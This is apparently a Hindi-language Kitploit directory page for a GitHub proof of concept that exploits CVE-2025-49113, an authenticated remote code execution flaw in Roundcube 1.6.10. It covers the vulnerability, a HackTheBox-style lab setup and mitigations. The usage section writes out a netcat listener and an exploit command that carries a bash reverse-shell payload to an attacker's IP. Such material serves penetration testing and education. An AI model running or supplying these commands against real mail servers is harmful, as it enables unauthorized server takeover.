Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-49113-Roundcube_1.6.10 — प्रमाणित रिमोट कोड निष्पादन एक्सप्लॉइट Roundcube 1.6.10 (CVE-2025-49113) के लिए। वेबमेल इंटरफ़ेस के माध्यम से एक निर्मित PHP पेलोड के ज़रिए रिवर्स शेल प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/cyberquestor-infosec/cve-2025-49113-roundcube_1.6.10
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubcyberquestor-infosec/cve-2025-49113-roundcube_1.6.10

CVE-2025-49113-Roundcube_1.6.10

प्रमाणित रिमोट कोड निष्पादन एक्सप्लॉइट Roundcube 1.6.10 (CVE-2025-49113) के लिए। वेबमेल इंटरफ़ेस के माध्यम से एक निर्मित PHP पेलोड के ज़रिए रिवर्स शेल प्रदान करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-49113 – Roundcube 1.6.10 प्रमाणित रिमोट कोड निष्पादन

⚠️ अस्वीकरण
यह रिपॉजिटरी केवल शैक्षिक और शोध उद्देश्यों के लिए है।
सभी प्रदर्शन एक नियंत्रित लैब वातावरण में किए गए थे।
बिना स्पष्ट अनुमति के सिस्टम का अनधिकृत परीक्षण या शोषण अवैध और अनैतिक है। इस जानकारी के किसी भी दुरुपयोग के लिए लेखक जिम्मेदार नहीं है।


📌 Roundcube क्या है?

Roundcube PHP में लिखा गया एक व्यापक रूप से उपयोग किया जाने वाला, ब्राउज़र-आधारित IMAP ईमेल क्लाइंट है। यह वेबमेल एक्सेस के लिए एक उपयोगकर्ता-अनुकूल इंटरफ़ेस प्रदान करता है और आमतौर पर होस्टिंग प्रदाताओं, शैक्षणिक संस्थानों और आंतरिक एंटरप्राइज़ मेल सर्वरों द्वारा तैनात किया जाता है।


🚨 भेद्यता के बारे में

CVE-2025-49113 एक भेद्यता है जो Roundcube संस्करण 1.6.10 को प्रभावित करती है और एक प्रमाणित उपयोगकर्ता को वेबमेल इंटरफ़ेस के माध्यम से एक विशेष रूप से तैयार कमांड सबमिट करके रिमोट कोड निष्पादन (RCE) प्राप्त करने की अनुमति देती है।

सफल शोषण के लिए मान्य उपयोगकर्ता क्रेडेंशियल्स की आवश्यकता होती है। एक बार शोषित होने के बाद, यह वेब सर्वर के संदर्भ के आधार पर सिस्टम-स्तरीय कमांड निष्पादन प्रदान करता है।

  • CVE ID: CVE-2025-49113
  • प्रभावित एप्लिकेशन: Roundcube 1.6.10
  • भेद्यता प्रकार: प्रमाणित रिमोट कोड निष्पादन
  • एक्सप्लॉइट प्रकार: PHP पेलोड के माध्यम से रिवर्स शेल
  • एक्सप्लॉइट उपलब्धता: सार्वजनिक GitHub PoC

⚙️ लैब सेटअप

  • लक्ष्य URL: http://mail.outbound.htb
  • Roundcube संस्करण: 1.6.10
  • लिसनर: पोर्ट 4444 पर Netcat
  • एक्सप्लॉइट: CVE-2025-49113.php

🚀 एक्सप्लॉइट उपयोग

1. Netcat लिसनर प्रारंभ करें

root@kitploit:~
nc -nlvp 4444

2. एक्सप्लॉइट चलाएँ

root@kitploit:~
php CVE-2025-49113.php {url} {username} {password} "bash -c 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1'"

🔧 <YOUR-IP> को अपने हमलावर के IP से बदलें।


📸 प्रदर्शन

एक्सप्लॉइट स्क्रिप्ट आउटपुट

एक्सप्लॉइट स्क्रिप्ट चल रही है

रिवर्स शेल कैप्चर हुआ

रिवर्स शेल लिसनर


🔐 शमन

  • Roundcube को नवीनतम स्थिर और सुरक्षित रिलीज़ में अपग्रेड करें।
  • कमजोर घटकों तक उपयोगकर्ता की पहुँच हटाएँ या प्रतिबंधित करें।
  • वेबमेल इंटरफ़ेस के लिए सख्त एक्सेस नियंत्रण और IP व्हाइटलिस्टिंग लागू करें।
  • विसंगतियों के लिए प्रमाणीकरण लॉग की निगरानी करें।
  • वेब सर्वर वातावरण पर न्यूनतम विशेषाधिकार सिद्धांत लागू करें।

📝 नोट्स

  • एक्सप्लॉइट के लिए प्रमाणीकरण आवश्यक है।
  • केवल Roundcube 1.6.10 के विरुद्ध परीक्षण किया गया है।
  • शेल का उपयोगकर्ता संदर्भ सर्वर कॉन्फ़िगरेशन पर निर्भर करता है।
  • प्रदर्शन एक वर्चुअल लैब वातावरण में किया गया था।

📚 संदर्भ

  • OffSec ब्लॉग पोस्ट
  • सार्वजनिक एक्सप्लॉइट

📝 Medium ब्लॉग

मेरी Medium पोस्ट पर विस्तृत वॉकथ्रू और सिद्धांत देखें:
👉 Medium पर ब्लॉग पढ़ें

टूल डाउनलोड करें